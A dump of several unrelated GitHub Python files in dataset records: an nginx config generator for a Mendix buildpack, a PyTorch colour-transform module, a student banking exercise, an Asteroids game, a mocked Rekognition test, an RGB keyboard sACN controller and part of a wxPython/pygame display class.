nginx_keepalive_timeout=_get_nginx_keepalive_timeout(),\n nginx_port=str(util.get_nginx_port()),\n runtime_port=str(util.get_runtime_port()),\n admin_port=str(util.get_admin_port()),\n root=os.getcwd(),\n mxadmin_path=MXADMIN_PATH,\n client_cert_check_internal_path_prefix=CLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX,\n )\n\n logging.debug(\"Writing nginx configuration file...\")\n with open(output_path, \"w\") as file_:\n file_.write(rendered)\n logging.debug(\"nginx configuration file written\")\n\n # Populating proxy params template\n output_path = os.path.abspath(PROXY_FILE)\n template_path = os.path.abspath(f\"{PROXY_FILE}.j2\")\n\n with 
open(template_path, \"r\") as file_:\n template = Template(file_.read(), trim_blocks=True, lstrip_blocks=True)\n rendered = template.render(\n proxy_buffers=_get_proxy_buffers(),\n proxy_buffer_size=_get_proxy_buffer_size(),\n )\n\n logging.debug(\"Writing proxy_params configuration file...\")\n with open(output_path, \"w\") as file_:\n file_.write(rendered)\n logging.debug(\"proxy_params configuration file written\")\n\n _generate_password_file({\"MxAdmin\": security.get_m2ee_password()})\n\n\ndef _get_nginx_keepalive_timeout():\n return os.environ.get(\"NGINX_KEEPALIVE_TIMEOUT\", \"100\")\n\n\ndef _get_proxy_buffer_size():\n return os.environ.get(\"NGINX_PROXY_BUFFER_SIZE\", None)\n\n\ndef _get_proxy_buffers():\n return os.environ.get(\"NGINX_PROXY_BUFFERS\", None)\n\n\n# Access restriction configuration\n# Example:\n# {\n# \"/\":\n# {'ipfilter': ['10.0.0.0/8'], 'client_cert': true, 'satisfy': 'any'},\n# \"/ws/MyWebService/\":\n# {'ipfilter': ['10.0.0.0/8'], 'client_cert': true, 'satisfy': 'all'},\n# \"/CustomRequestHandler/\":\n# {'ipfilter': ['10.0.0.0/8']},\n# \"/CustomRequestHandler2/\":\n# {'basic_auth': {'user1': 'password', 'user2': 'password2'}},\n# }\ndef _get_access_restrictions():\n return json.loads(os.environ.get(\"ACCESS_RESTRICTIONS\", \"{}\"))\n\n\n# Custom location configuration\n# Example:\n# {\n# \"/some_location\", {\"body\": \"set $something $other;\"},\n# }\ndef _get_custom_locations():\n return json.loads(os.environ.get(\"NGINX_CUSTOM_LOCATIONS\", \"{}\"))\n\n\ndef _get_http_headers():\n headers_from_json = {}\n\n # this is kept for X-Frame-Options backward compatibility\n x_frame_options = os.environ.get(\"X_FRAME_OPTIONS\", \"ALLOW\")\n if x_frame_options != \"ALLOW\":\n headers_from_json[\"X-Frame-Options\"] = x_frame_options\n\n headers_json = os.environ.get(\"HTTP_RESPONSE_HEADERS\", \"{}\")\n\n try:\n headers_from_json.update(json.loads(headers_json))\n except Exception:\n logging.error(\n \"Failed to parse HTTP_RESPONSE_HEADERS due to invalid JSON string: '%s'\",\n headers_json,\n )\n raise\n\n result = []\n for header_key, header_value in headers_from_json.items():\n regex = ALLOWED_HEADERS[header_key]\n if regex and re.match(regex, header_value):\n escaped_value = header_value.replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n result.append((header_key, escaped_value))\n logging.debug(\n \"Added header %s '%s' to nginx config\", header_key, header_value\n )\n else:\n logging.warning(\n \"Skipping %s config, value '%s' is not valid\", header_key, header_value\n )\n\n return result\n\n\ndef _get_nginx_bin_path():\n nginx_bin_path = os.environ.get(\"NGINX_CUSTOM_BIN_PATH\", \"nginx/sbin/nginx\")\n return nginx_bin_path\n\n\ndef run():\n nginx_process = subprocess.Popen(\n [\n _get_nginx_bin_path(),\n \"-p\",\n \"nginx\",\n \"-c\",\n str(os.path.abspath(CONFIG_FILE)),\n ]\n )\n return nginx_process\n\n\ndef _generate_password_file(users_passwords, file_name_suffix=\"\"):\n with open(\"nginx/.htpasswd\" + file_name_suffix, \"w\") as file_handler:\n for user, password in users_passwords.items():\n if not password:\n file_handler.write(\"\\n\")\n else:\n file_handler.write(\n f\"{user}:\"\n f\"{crypt.crypt(password, crypt.mksalt(crypt.METHOD_SHA512))}\\n\"\n )\n\n\n@dataclass\nclass Location:\n path: str = None\n body: str = None\n index: int = 0\n\n # Proxy parameters\n proxy_buffering_enabled: bool = True\n proxy_intercept_errors_enabled: bool = False\n\n # Access restriction parameters\n satisfy: str = \"any\"\n ipfilter_ips: list = None\n basic_auth_enabled: 
bool = False\n client_cert_enabled: bool = False\n issuer_dn_regex: str = None\n issuer_dn: str = None\n\n\n# Adds a \"/\" after a path for comparison\n# This is required to check if a path is indeed a subpath of another path\ndef _get_slashed_path(path):\n return path if path.endswith(\"/\") else path + \"/\"\n\n\n# Gets the location configuration for the most specific path that matches the path\n# This is required to ensure that \"nested\" locations\n# have the same configuration as their parent\ndef _get_most_specific_location_config(path, locations):\n sorted_paths = sorted(locations.keys())\n sorted_paths.reverse()\n for sorted_path in sorted_paths:\n if _is_subpath_of(path, sorted_path):\n return locations[sorted_path]\n return {}\n\n\n# Returns if a path is a subpath of others\n# others can be a string or collection of strings\ndef _is_subpath_of(path, others):\n if isinstance(others, str):\n return path == others or path.startswith(_get_slashed_path(others))\n return any(_is_subpath_of(path, p) for p in others)\n\n\ndef _get_locations(\n access_restrictions=_get_access_restrictions(),\n custom_locations=_get_custom_locations(),\n):\n locations = {**custom_locations, **access_restrictions}\n\n # Add default locations\n for default_path in DEFAULT_LOCATION_PATHS:\n locations[default_path] = _get_most_specific_location_config(\n default_path, locations\n )\n\n # Get request handlers and determine which request handlers are \"dynamic\",\n # i.e. most likely for an API, e.g. REST\n dynamic_handler_paths = []\n request_handlers = runtime.get_metadata_value(\"RequestHandlers\")\n if request_handlers is not None:\n paths = [handler[\"Name\"] for handler in request_handlers]\n dynamic_handler_paths = list(set(paths) - set(DEFAULT_REQUEST_HANDLER_PATHS))\n\n # Add dynamic request handler locations\n for dynamic_handler_path in dynamic_handler_paths:\n locations[\n _get_slashed_path(dynamic_handler_path)\n ] = _get_most_specific_location_config(dynamic_handler_path, locations)\n\n # Get REST request handlers from metadata and add locations\n rest_handler_paths = []\n try:\n rest_handler_paths = runtime.get_rest_request_handler_paths()\n for rest_handler_path in rest_handler_paths:\n locations[\n _get_slashed_path(rest_handler_path)\n ] = _get_most_specific_location_config(rest_handler_path, locations)\n except Exception as exc:\n logging.error(\"Cannot get REST handlers from model: %s\", exc)\n\n # Convert dictionary into list of locations\n index = 0\n result = []\n\n for path, config in locations.items():\n location = Location()\n location.path = path\n location.index = index\n\n # Reserved path prefixes are restricted\n if any(path.startswith(prefix) for prefix in RESERVED_PATH_PREFIXES):\n raise Exception(f\"Can not override location on reserved path [{path}]\")\n\n # If body is set and is only element, assume custom location\n if len(config) == 1 and \"body\" in config:\n location.body = config[\"body\"]\n\n # Else, assume access restriction\n else:\n # Disable proxy buffering for files\n if path == FILE_HANDLER_PATH:\n location.proxy_buffering_enabled = False\n\n # Enable error interception for default runtime paths\n # This is required for custom error pages\n if (\n _is_subpath_of(path, DEFAULT_REQUEST_HANDLER_PATHS)\n or path in DEFAULT_LOCATION_PATHS\n ):\n location.proxy_intercept_errors_enabled = True\n\n # Explicitly disable error interception for dynamic request handlers\n # This is not strictly required (default is disabled)\n # but it might be in the future\n if 
_is_subpath_of(path, dynamic_handler_paths) or _is_subpath_of(\n path, rest_handler_paths\n ):\n location.proxy_intercept_errors_enabled = False\n\n # Add the access restrictions configuration\n # \"Satisfy\" specifies if restrictions should be\n # evaluated as \"AND\" (all) or \"OR\" (any)\n if \"satisfy\" in config:\n if config[\"satisfy\"] in [\"any\", \"all\"]:\n location.satisfy = config[\"satisfy\"]\n else:\n raise Exception(f\"Invalid satisfy value: {config['satisfy']}\")\n\n # Add IP filter configuration\n if \"ipfilter\" in config:\n location.ipfilter_ips = []\n for ip in config[\"ipfilter\"]:\n location.ipfilter_ips.append(ip)\n\n # Add HTTP basic auth configuration\n if \"basic_auth\" in config:\n location.basic_auth_enabled = True\n _generate_password_file(config[\"basic_auth\"], str(index))\n\n # Add client certificate configuration\n if config.get(\"client-cert\") or config.get(\"client_cert\"):\n location.client_cert_enabled = True\n\n # Add \"Issuer DN\" check for the client certificate chain.\n # The required header is passed on from an upstream proxy,\n # which in the case of Mendix Cloud is the Front-Facing Fleet\n # This scenario isn't covered by integration tests.\n # Please test manually if Nginx is properly matching the\n # SSL-Client-I-DN HTTP header with the configuration\n # in the ACCESS_RESTRICTIONS environment variable.\n if \"issuer_dn\" in config:\n location.issuer_dn_regex = \"\"\n location.issuer_dn = \"\"\n for i in config[\"issuer_dn\"]:\n # Workaround for missing identifier strings from Java\n # This should be fixed in upstream code by using\n # different certificate libraries\n issuer = i.replace(\"OID.2.5.4.97\", \"organizationIdentifier\")\n\n location.issuer_dn += f\"{issuer}|\"\n\n # Escape special characters\n issuer = issuer.replace(\" \", \"\\\\040\")\n issuer = issuer.replace(\".\", \"\\\\.\")\n issuer = issuer.replace(\"'\", \"\\\\'\")\n\n location.issuer_dn_regex += f\"{issuer}|\"\n location.issuer_dn = location.issuer_dn[:-1]\n location.issuer_dn_regex = location.issuer_dn_regex[:-1]\n\n result.append(location)\n index += 1\n\n return result\n","repo_name":"mendix/cf-mendix-buildpack","sub_path":"buildpack/core/nginx.py","file_name":"nginx.py","file_ext":"py","file_size_in_byte":15499,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"73169054864","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\n\nclass ColorTransform(nn.Module):\n def __init__(self, para_path):\n super(ColorTransform, self).__init__()\n file = np.load(para_path, allow_pickle=True)\n self.degree = file['d']\n weight = torch.from_numpy(file['weight'])\n bias = torch.from_numpy(file['bias'])\n self.register_buffer('weight', weight)\n self.register_buffer('bias', bias)\n\n def poly_feature(self, x, degree=None):\n if degree is None:\n degree = self.degree\n n = x.shape[1]\n feature = [x.clone()]\n index = list(range(n))\n for d in range(1, degree):\n new = []\n k = 0\n for i in range(n):\n new.append(x[:, i:i + 1] * feature[-1][:, index[i]:])\n index[i] = k\n k = k + new[-1].shape[1]\n new = torch.cat(new, 1)\n feature.append(new)\n feature = torch.cat(feature, 1)\n return feature\n\n def forward(self, x):\n f = self.poly_feature(x)\n f = f.transpose(1, -1)\n # pred = (f.unsqueeze(1) * weight.unsqueeze(0)).sum(2) + bias\n pred = torch.matmul(f, self.weight) + self.bias\n pred = pred.transpose(1, -1)\n return 
pred","repo_name":"WhoTHU/Adversarial_camou","sub_path":"color_util.py","file_name":"color_util.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"44159428461","text":"from random import randint\r\n\r\n\r\nclass Account:\r\n balance = (randint(1000, 20000))\r\n\r\n def __init__(self, Name, Ac, Ac_type):\r\n self.name = Name\r\n self.ac = Ac\r\n self.type = Ac_type\r\n\r\n def deposit(self, Amount):\r\n print(\"Successfully Deposited\")\r\n self.balance += Amount\r\n\r\n def withdraw(self, Amount):\r\n print(\"Withdrawal Successful\")\r\n self.balance -= Amount\r\n\r\n\r\nclass FixDeposit(Account):\r\n fd_rate = 6.4\r\n\r\n def __init__(self, Fd_amt):\r\n super().__init__(name, ac, Type)\r\n self.fd_amt = Fd_amt\r\n\r\n def cal_fd(self):\r\n si = (self.fd_amt * self.fd_rate * 10) / 100\r\n print(\"Final Amount After 10 years is : \", si + self.fd_amt)\r\n\r\n def display_fd(self):\r\n print(\"---------------------------------------\")\r\n print(\"Name : \", self.name)\r\n print(\"A/c No. :- \", self.ac)\r\n print(\"A/c Type: \", self.type)\r\n print(\"Balance: \", self.balance)\r\n print(\"FD Amount: \", self.fd_amt)\r\n print(\"Fix Deposit Successfully Created......\")\r\n\r\n\r\nclass Loan(Account):\r\n loan_rate = 8.5\r\n\r\n def __init__(self, Loan_amt):\r\n super().__init__(name, ac, Type)\r\n self.loan_amt = Loan_amt\r\n\r\n def cal_loan(self):\r\n si = (self.loan_amt * self.loan_rate * 10) / 100\r\n print(\"Final Amount After 10 years is : \", si + self.loan_amt)\r\n\r\n def display_loan(self):\r\n print(\"---------------------------------------\")\r\n print(\"Name : \", self.name)\r\n print(\"A/c No. :- \", self.ac)\r\n print(\"A/c Type: \", self.type)\r\n print(\"Balance: \", self.balance)\r\n print(\"Loan Amount: \", self.loan_amt)\r\n if self.type.lower() == \"saving\" and self.balance > 5000:\r\n print(\"Loan Successfully Granted......\")\r\n else:\r\n print(\"Sorry..unable to grant you a loan\")\r\n\r\n\r\nprint(\"---------------- Bank Of Baroda----------------\")\r\nname = input(\"Enter Ur Name: \")\r\nac = int(input(\"Enter Ur A/c No. 
:- \"))\r\nType = input(\"Enter Account Type:- \")\r\nif not len(str(ac)) == 14:\r\n exit(0)\r\n\r\nprint(\"\\n1) View or Update Balance \\n2) Fix Deposit \\n3) Loan \\n4) Exit \")\r\nselection = int(input(\"\\nEnter your selection: \"))\r\n\r\nAcc = Account(name, ac, Type)\r\n\r\nif selection == 1:\r\n print(\"Current Balance: \", Acc.balance)\r\n print(\" 1)Add Amount\\n 2)Withdraw Amount\\n 3)Exit\")\r\n choice = int(input(\"Enter Ur Choice: \"))\r\n amount = int(input(\"Enter ur Amount : \"))\r\n if choice == 1:\r\n Acc.deposit(amount)\r\n print(\"New Balance: \", Acc.balance)\r\n elif choice == 2:\r\n if amount < Acc.balance:\r\n Acc.withdraw(amount)\r\n else:\r\n print(\"Insufficient Balance\")\r\n\r\n print(\"New Balance: \", Acc.balance)\r\n elif choice == 3:\r\n exit(0)\r\n else:\r\n print(\"Invalid Input\")\r\n\r\nelif selection == 2:\r\n fd_amt = int(input(\"Enter Ur FD Amount: \"))\r\n fd = FixDeposit(fd_amt)\r\n print(\" 1)Add This Amount Externally\\n 2)Deduct This Amount From Ur Current Balance\")\r\n choice = int(input(\"Enter Ur Choice: \"))\r\n\r\n print(\"Balance: \", fd.balance)\r\n if choice == 1:\r\n print(fd_amt)\r\n\r\n elif choice == 2:\r\n if fd_amt < fd.balance:\r\n fd.withdraw(fd_amt)\r\n print(\"New Balance: \", fd.balance)\r\n else:\r\n print(\"Insufficient Balance\")\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n fd.display_fd()\r\n fd.cal_fd()\r\n\r\nelif selection == 3:\r\n loan_amt = int(input(\"Enter Ur Loan Amount: \"))\r\n ln = Loan(loan_amt)\r\n\r\n ln.display_loan()\r\n ln.cal_loan()\r\n","repo_name":"Rachit304/Python-Practice-Programs","sub_path":"Lab8.py","file_name":"Lab8.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30170917361","text":"from math import pi, cos, sin, sqrt\nfrom random import randint\nfrom Astroid import Astroid\nfrom Projectile import Projectile\nfrom highscoreLogger import Logger\nimport pickle\n\nclass Game:\n def __init__(self):\n self.logger = Logger()\n\n self.state = 0\n #State 0: Menu\n #State 1: Game\n #State 2: Pause\n #State 3: Highscore input\n\n #Game flags\n self.incoming_astroids = False\n\n #Player/ship variables\n self.ro = 0\n self.x = 400\n self.y = 300\n self.points = 0\n self.shield = 3\n self.stage = 0\n self.vel = [0.0, 0.0]\n self.dead = False\n self.thrust_counter = 0\n self.thrust = False\n\n #Astroid and projectile list\n self.astr = []\n self.pjct = []\n\n #game fase handeling variables\n self.counter = 0\n self.pause_counter = 0\n\n #Highscore definitions\n self.scores = self.get_highscores()[:10]\n self.localScores = self.get_local_highscores()[:5]\n\n def tick(self, pg, pressed):\n if self.state == 1:\n\n #stage\n if len(self.astr) == 0 and not self.dead:\n self.pause_counter += 1\n self.incoming_astroids = True\n self.pjct = []\n if self.pause_counter >= 80:\n self.pause_counter = 0\n self.incoming_astroids = False\n self.newStage()\n\n #check_if_dead\n if self.dead:\n self.death_init()\n\n #ship_direction_calc\n dir = mapFromTo(self.ro, 0, 360, 0.0, 2 * pi)\n\n #controls\n if (pressed[pg.K_w] or pressed[pg.K_UP]) and vec_length(self.vel) < 8:\n self.vel[0] += cos(dir) * 0.2\n self.vel[1] += sin(dir) * 0.2\n self.thrust = True\n else:\n self.thrust = False\n if pressed[pg.K_a] or pressed[pg.K_LEFT]:\n self.ro -= 5\n if pressed[pg.K_d] or pressed[pg.K_RIGHT]:\n self.ro += 5\n self.counter += 1\n if pressed[pg.K_SPACE] and self.counter >= 25 and len(self.astr) != 0:\n self.counter = 0\n 
self.shoot()\n\n            #ship_movement_de-acc\n            self.vel[0] *= 0.985\n            self.vel[1] *= 0.985\n\n            #movement_execution\n            self.x += self.vel[0]\n            self.y += self.vel[1]\n            for i in self.astr:\n                i.move()\n            for i in self.pjct:\n                i.move()\n\n            #looping\n            ##player\n            if self.x < 0:\n                self.x = float(800)\n            elif self.x > 800:\n                self.x = float(0)\n            if self.y < 0:\n                self.y = float(600)\n            elif self.y > 600:\n                self.y = float(0)\n\n            ##Astroids\n            for astr in self.astr:\n                astrLBx = float(- astr.size * 10)\n                astrUBx = float(800 + astr.size * 10)\n                astrLBy = float(- astr.size * 10)\n                astrUBy = float(600 + astr.size * 10)\n                if astr.x < astrLBx:\n                    astr.x = astrUBx\n                elif astr.x > astrUBx:\n                    astr.x = astrLBx\n                if astr.y < astrLBy:\n                    astr.y = astrUBy\n                elif astr.y > astrUBy:\n                    astr.y = astrLBy\n\n            ##projectiles\n            for pjct in self.pjct:\n                if pjct.x < 0:\n                    pjct.x = float(800)\n                elif pjct.x > 800:\n                    pjct.x = float(0)\n                if pjct.y < 0:\n                    pjct.y = float(600)\n                elif pjct.y > 600:\n                    pjct.y = float(0)\n\n            #delete_projectiles\n            plist = []\n            for pjct in self.pjct:\n                if vec_length(pjct.vel) < 0.4:\n                    plist.append(pjct)\n            for pjct in plist:\n                self.pjct.remove(pjct)\n\n            #collision\n            if len(self.astr) * len(self.pjct) > 0:\n                self.points += self.hit(self.pjct, self.astr)\n            if self.collision():\n                self.ship_hit()\n\n\n    def newStage(self):\n        self.stage += 1\n        newAstr = int(self.stage * 1.5 + 4)\n        for i in range(newAstr):\n            side = i % 4\n            if side == 0:\n                self.astr.append(Astroid(50, 50 + randint(0, 700), 3))\n            if side == 1:\n                self.astr.append(Astroid(50 + randint(0, 500), 50, 3))\n            if side == 2:\n                self.astr.append(Astroid(750, 50 + randint(0, 700), 3))\n            if side == 3:\n                self.astr.append(Astroid(50 + randint(0, 500), 550, 3))\n\n    def ship_hit(self):\n        self.shield -= 1\n        if self.shield > 0:\n            self.death_init()\n        else:\n            self.highscore_input()\n\n    def hit(self, pjct, astr):\n        points = 0\n        plist = []\n        alist = []\n        for i,p in enumerate(pjct):\n            for j,a in enumerate(astr):\n                if dist(p.x, a.x, p.y, a.y) < a.size * 10 + 1:\n                    plist.append(i)\n                    split_a = a.split()\n                    if split_a is not None:\n                        astr.append(split_a)\n                        points += 100 * (split_a.size + 1)\n                    else:\n                        alist.append(j)\n                        points += 100\n\n        for i in uniq(plist)[::-1]:\n            del self.pjct[i]\n\n        for i in uniq(alist)[::-1]:\n            del self.astr[i]\n\n        return points\n    \n    def collision(self):\n        hit = False\n        for i in range(len(self.astr)):\n            di = dist(self.x, self.astr[i].x, self.y, self.astr[i].y)\n            if di < 4 + self.astr[i].size * 10:\n                hit = True\n        return hit\n    \n    def shoot(self):\n        dir = mapFromTo(self.ro, 0, 360, 0.0, 2 * pi)\n        vel = [cos(dir) * 8, sin(dir) * 8]\n        self.pjct.append(Projectile(self.x + cos(dir) * 8, self.y + sin(dir) * 8, vel))\n\n    def Ship_pointlist(self):\n        lst = [[8, 135], [8, 225], [8, 0]]\n        ship_point_list = []\n        for i in range(3):\n            dir = mapFromTo(self.ro + lst[i][1], 0, 360, 0.0, 2 * pi)\n            P = [self.x + cos(dir) * lst[i][0], self.y + sin(dir) * lst[i][0]]\n            ship_point_list.append(P)\n        return ship_point_list\n\n    def Ship_thrust_pointlist(self):\n        lst = [[6, 160], [10, 180], [6, 200]]\n        ship_thrust_point_list = []\n        for i in range(3):\n            dir = mapFromTo(self.ro + lst[i][1], 0, 360, 0.0, 2 * pi)\n            P = [self.x + cos(dir) * lst[i][0], self.y + sin(dir) * lst[i][0]]\n            ship_thrust_point_list.append(P)\n        return ship_thrust_point_list\n\n    def death_init(self):\n        self.pause_counter += 1\n        if not self.dead:\n            self.x = 400\n            self.y = 300\n            self.ro = 0\n            self.vel = [0.0, 0.0]\n            self.dead = True\n            self.pjct = []\n            self.temp_astr = self.astr.copy()\n            self.astr = []\n\n        elif 
self.pause_counter >= 80:\n self.pause_counter = 0\n self.dead = False\n for i in range(len(self.temp_astr)):\n side = i % 4\n if side == 0:\n self.temp_astr[i].x, self.temp_astr[i].y = (50, 50 + randint(0, 700))\n if side == 1:\n self.temp_astr[i].x, self.temp_astr[i].y = (50 + randint(0, 500), 50)\n if side == 2:\n self.temp_astr[i].x, self.temp_astr[i].y = (750, 50 + randint(0, 700))\n if side == 3:\n self.temp_astr[i].x, self.temp_astr[i].y = (50 + randint(0, 500), 550)\n self.astr = self.temp_astr.copy()\n\n\n def reload(self, state=0):\n self.state = state\n self.ro = 0\n self.x = 400\n self.y = 300\n self.points = 0\n self.shield = 3\n self.stage = 0\n self.vel = [0.0, 0.0]\n self.astr = []\n self.pjct = []\n self.counter = 0\n self.scores = self.get_highscores()[:10]\n self.localScores = self.get_local_highscores()[:5]\n\n def save_highscore(self, name):\n #Pickle database\n\n try:\n with open('highscore.txt', 'rb') as f:\n scores = pickle.load(f) #score = {'Name':'','Score':0,'Stage':0} layout of stored indexes\n except:\n print('No Scorefile, creating score file')\n score = {'Name': '', 'Score': 0, 'Stage': 0}\n scores = []\n for i in range(5):\n scores.append(score)\n with open('highscore.txt', 'wb') as f:\n pickle.dump(scores, f)\n for i in range(len(scores)):\n if self.points > scores[i]['Score']:\n newHigh = {'Name': str(name), 'Score': self.points, 'Stage': self.stage}\n scores.insert(i, newHigh)\n break\n scores = scores[:5]\n self.localScores = scores[:5]\n with open('highscore.txt', 'wb') as f:\n print('saving scorefile')\n pickle.dump(scores, f)\n\n\n #online database\n if self.points > 0:\n self.logger.post_score('Astroid', self.points, str(name), self.stage)\n\n scores = []\n try:\n for s in self.logger.get_scores('Astroid'):\n scores.append({'Name': s['Opt1'], 'Score': s['Score'], 'Stage': s['Opt2']})\n scores = sorted(scores, key=lambda scores: scores['Score'], reverse=True)\n except:\n print('server database error')\n\n self.reload()\n\n def get_highscores(self):\n scores = []\n try:\n for s in self.logger.get_scores('Astroid'):\n scores.append({'Name': s['Opt1'], 'Score': s['Score'], 'Stage': s['Opt2']})\n return sorted(scores, key=lambda scores: scores['Score'], reverse=True)\n except:\n print('server database error')\n return []\n\n def get_local_highscores(self):\n try:\n with open('highscore.txt', 'rb') as f:\n scores = pickle.load(f) #score = {'name':'','score':0,'stage':0}\n except:\n print('No Scorefile, creating score file')\n score = {'Name': '', 'Score': 0, 'Stage': 0}\n scores = []\n for i in range(5):\n scores.append(score)\n with open('highscore.txt', 'wb') as f:\n pickle.dump(scores, f)\n return scores\n\n def start_game(self):\n if self.state == 0:\n self.state = 1\n self.reload(1)\n\n def end_game(self):\n if self.state > 0:\n self.state = 0\n\n def toggle_pause(self):\n if self.state == 1:\n self.state = 2\n self.scores = self.get_highscores()[:10]\n elif self.state == 2:\n self.state = 1\n\n def highscore_input(self):\n if self.state == 1:\n self.state = 3\n\n\n\ndef mapFromTo(x, a, b, c, d):\n y = (x - a) / (b - a) * (d - c) + c\n return y\n\n\ndef dist(x1, x2, y1, y2):\n d = sqrt(((x1 - x2)**2) + ((y1 - y2)**2))\n return d\n\n\ndef vec_length(vec):\n lenght = sqrt(vec[0]**2 + vec[1]**2)\n return lenght\n\n\ndef uniq(lst):\n seen = set()\n uniq = []\n for x in lst:\n if x not in seen:\n uniq.append(x)\n seen.add(x)\n uniq.sort()\n return 
uniq","repo_name":"jonas8217/Astroid","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":11567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72737430225","text":"import unittest\nfrom unittest.mock import patch\n\nimport rekognition\n\n\nclass TestRekognition(unittest.TestCase):\n @patch(\"rekognition.boto3\")\n def test_detect_faces_succeeded(self, m_boto3):\n aws_response = {\n \"FaceDetails\": [\n {\n \"BoundingBox\": {\n \"Height\": 0.18000000715255737,\n \"Left\": 0.5555555820465088,\n \"Top\": 0.33666667342185974,\n \"Width\": 0.23999999463558197,\n },\n \"Confidence\": 100,\n \"Smile\": {\"Value\": True, \"Confidence\": 100},\n \"Eyeglasses\": {\"Value\": True, \"Confidence\": 100},\n }\n ],\n \"ResponseMetadata\": {\"HTTPStatusCode\": 200},\n }\n m_boto3.client.return_value.detect_faces.return_value = aws_response\n response = rekognition.faces_in_s3object(\"selfies\", \"face.jpg\")\n\n self.assertIsNotNone(response)\n self.assertIsInstance(response, list)\n self.assertIsInstance(response[0], dict)\n\n @patch(\"rekognition.boto3\")\n def test_detect_faces_failed(self, m_boto3):\n aws_response = {\n \"FaceDetails\": [],\n \"ResponseMetadata\": {\"HTTPStatusCode\": 200},\n }\n m_boto3.client.return_value.detect_faces.return_value = aws_response\n response = rekognition.faces_in_s3object(\"selfies\", \"face.jpg\")\n\n self.assertIsNotNone(response)\n self.assertIsInstance(response, list)\n self.assertEqual(len(response), 0)\n","repo_name":"noverde/serpens","sub_path":"tests/test_rekognition.py","file_name":"test_rekognition.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40812495554","text":"#!/usr/bin/python3\n\nimport hid\nimport sacn\nimport layout\nimport time\nimport queue\nimport threading\nimport platform\n\nRK84_VID = 0x258a\nRK84_PID = 0xc8\nIP = \"127.0.0.84\"\n\nreceiver = sacn.sACNreceiver(IP)\nrk84 = hid.enumerate(RK84_VID, RK84_PID)\nh = hid.device()\npackets_queue = queue.Queue()\npacket_sender_stop_event = threading.Event()\nlast_packets: list[bytes] = []\n\n@receiver.listen_on('universe', universe=1)\ndef sacn_callback(packet: sacn.DataPacket):\n global last_packets\n \n dmx_data = packet.dmxData\n colors = []\n\n for i in range(0, min(16*6*3, len(dmx_data)), 3):\n colors.append((dmx_data[i], dmx_data[i+1], dmx_data[i+2]))\n\n colors_dict = layout.colors_list_to_keys_dict(colors)\n packets = layout.colors_dict_to_usb_packets(colors_dict)\n\n # print(\"sending packets:\")\n for packet in packets:\n packets_queue.put(packet)\n\n last_packets = packets\n\ndef usb_packet_sender():\n while not packet_sender_stop_event.is_set():\n try:\n packet = packets_queue.get(block=True, timeout=1)\n # print(packet.hex(\" \"))\n h.send_feature_report(packet)\n except queue.Empty:\n if packet_sender_stop_event.is_set():\n break\n else:\n # resend last packets\n for packet in last_packets:\n h.send_feature_report(packet)\n\nif __name__ == \"__main__\":\n rk_path = None\n if platform.system() == \"Windows\":\n for interface in rk84:\n # pprint.pprint(interface)\n if interface['usage_page'] == 65280:\n rk_path = interface['path']\n # break\n elif platform.system() == \"Linux\":\n if len(rk84) >=2:\n rk_path = rk84[1]['path']\n\n if rk_path is None:\n print(\"RK84N not found\")\n exit(1)\n\n h.open_path(rk_path)\n h.set_nonblocking(1)\n\n packet_sender_thread = 
threading.Thread(target=usb_packet_sender, daemon=True)\n packet_sender_thread.start()\n\n receiver.start()\n\n print(f\"sACN listening on {IP}\")\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print(\"Exiting...\")\n receiver.stop()\n packet_sender_stop_event.set()","repo_name":"kawaiiDango/rk84n-sacn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26469410173","text":"\"\"\" Defines all of the window elements, as well as tying everything together into one\napp. \"\"\"\n\n# I seriously need to figure out what the hell I'm doing with the imports.\n\nimport wx\nimport PreviewRenderer\nfrom SaveLoad import *\n\nclass PygameDisplay(wx.Window):\n \"\"\" Taken from a pygame.org entry by David Barker \n Still learning what's what.\"\"\"\n def __init__(self, parent, ID):\n wx.Window.__init__(self, parent, ID)\n self.parent = parent\n self.hwnd = self.GetHandle()\n \n self.size = self.GetSizeTuple()\n self.size_dirty = True\n \n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_TIMER, self.Update, self.timer)\n self.Bind(wx.EVT_SIZE, self.OnSize)\n \n self.fps = 60.0\n self.timespacing = 1000.0 / self.fps\n self.timer.Start(self.timespacing, False)\n \n \n \n def Update(self, event):\n # Any update tasks would go here (moving sprites, advancing animation frames etc.)\n self.Redraw()\n \n def Redraw(self):\n \n \n s = pygame.image.tostring(self.screen, 'RGBA') # Convert the surface to an RGB string\n img = wx.ImageFromData(self.size[0], self.size[1], s) # Load this string into a wx image\n bmp = wx.BitmapFromImage(img) # Get the image in bitmap form\n dc = wx.ClientDC(self) # Device context for drawing the bitmap\n dc.DrawBitmap(bmp, 0, 0, False) # Blit the bitmap image to the display\n del dc\n \n def OnPaint(self, event):\n self.Redraw()\n event.Skip() # Make sure the parent frame gets told to redraw as well\n \n def OnSize(self, event):\n # Need to figure out a way to make this a static size.\n # That way I can keep the previewer embedded into it's own frame.\n self.size = self.GetSizeTuple()\n self.size_dirty = True\n \n def Kill(self, event):\n # Make sure Pygame can't be asked to redraw /before/ quitting by unbinding all methods which\n # call the Redraw() method\n # (Otherwise wx seems to call Draw between quitting Pygame and destroying the frame)\n # This may or may not be necessary now that Pygame is just drawing to surfaces\n self.Unbind(event = wx.EVT_PAINT, handler = self.OnPaint)\n self.Unbind(event = wx.EVT_TIMER, handler = self.Update, source = 